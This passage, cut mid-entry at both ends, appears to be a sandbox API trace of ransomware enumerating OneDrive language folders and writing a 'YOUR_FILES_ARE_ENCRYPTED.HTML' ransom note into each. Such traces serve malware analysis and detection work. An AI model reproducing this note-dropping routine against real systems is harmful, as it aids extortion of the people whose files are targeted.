lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f8f6c52, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3f8f6c52, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3fe2e122, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.990] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.990] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.990] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.990] lstrlenW (lpString=".mui") returned 4 [0113.990] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.990] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f8f6c52, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3f8f6c52, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3fe2e122, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.990] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.990] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.990] GetProcessHeap () returned 0x600000 [0113.990] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\tr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.991] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.997] CloseHandle (hObject=0x334) returned 1 [0113.997] GetProcessHeap () returned 0x600000 [0113.997] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.998] GetProcessHeap () returned 0x600000 [0113.998] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0114.000] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3feecd85, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3feecd85, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3feecd85, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="tt", cAlternateFileName="")) returned 1 [0114.000] StrStrIW (lpFirst="tt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.000] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt") returned 78 [0114.000] GetProcessHeap () returned 0x600000 [0114.000] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.001] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt" [0114.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt\\*" [0114.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3feecd85, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3feecd85, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4038b58c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.002] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3feecd85, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3feecd85, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4038b58c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0114.002] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4038b58c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4038b58c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40b97255, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.002] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.002] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt\\FileSync.LocalizedResources.dll.mui") returned 114 [0114.002] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.002] lstrlenW (lpString=".mui") returned 4 [0114.002] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.002] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4038b58c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4038b58c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40b97255, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.002] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.003] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0114.003] GetProcessHeap () returned 0x600000 [0114.003] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\tt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0114.004] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.005] CloseHandle (hObject=0x334) returned 1 [0114.005] GetProcessHeap () returned 0x600000 [0114.005] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.005] GetProcessHeap () returned 0x600000 [0114.005] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.006] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40be3896, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40be3896, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40be3896, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ug", cAlternateFileName="")) returned 1 [0114.006] StrStrIW (lpFirst="ug", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.006] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug") returned 78 [0114.006] GetProcessHeap () returned 0x600000 [0114.006] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.006] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug" [0114.006] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug\\*" [0114.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40be3896, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40be3896, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4137d061, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.006] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40be3896, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40be3896, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4137d061, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0114.007] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4137d061, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4137d061, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x41f429f3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.007] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.007] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug\\FileSync.LocalizedResources.dll.mui") returned 114 [0114.007] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.007] lstrlenW (lpString=".mui") returned 4 [0114.007] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.007] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4137d061, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4137d061, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x41f429f3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.007] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.007] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0114.007] GetProcessHeap () returned 0x600000 [0114.007] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ug\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0114.008] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.009] CloseHandle (hObject=0x334) returned 1 [0114.009] GetProcessHeap () returned 0x600000 [0114.009] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.009] GetProcessHeap () returned 0x600000 [0114.009] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.009] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4223d845, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4223d845, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4223d845, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ug-arab", cAlternateFileName="")) returned 1 [0114.009] StrStrIW (lpFirst="ug-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.009] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab") returned 83 [0114.009] GetProcessHeap () returned 0x600000 [0114.009] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.009] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab" [0114.009] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab\\*" [0114.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4223d845, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4223d845, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4255e9da, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626878 [0114.010] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4223d845, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4223d845, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4255e9da, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0114.010] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4255e9da, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4255e9da, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4293ea9a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.010] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.010] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0114.010] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.010] lstrlenW (lpString=".mui") returned 4 [0114.010] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.010] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4255e9da, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4255e9da, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4293ea9a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.011] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0114.011] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0114.011] GetProcessHeap () returned 0x600000 [0114.011] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ug-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ug-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0114.011] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.012] CloseHandle (hObject=0x334) returned 1 [0114.013] GetProcessHeap () returned 0x600000 [0114.013] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.013] GetProcessHeap () returned 0x600000 [0114.013] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.014] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x429d715a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x429d715a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x429d715a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="uk", cAlternateFileName="")) returned 1 [0114.014] StrStrIW (lpFirst="uk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.014] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk") returned 78 [0114.014] GetProcessHeap () returned 0x600000 [0114.014] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.015] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk" [0114.015] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk\\*" [0114.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x429d715a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x429d715a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x431bcd83, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626838 [0114.016] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x429d715a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x429d715a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x431bcd83, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0114.016] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x431bcd83, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x431bcd83, 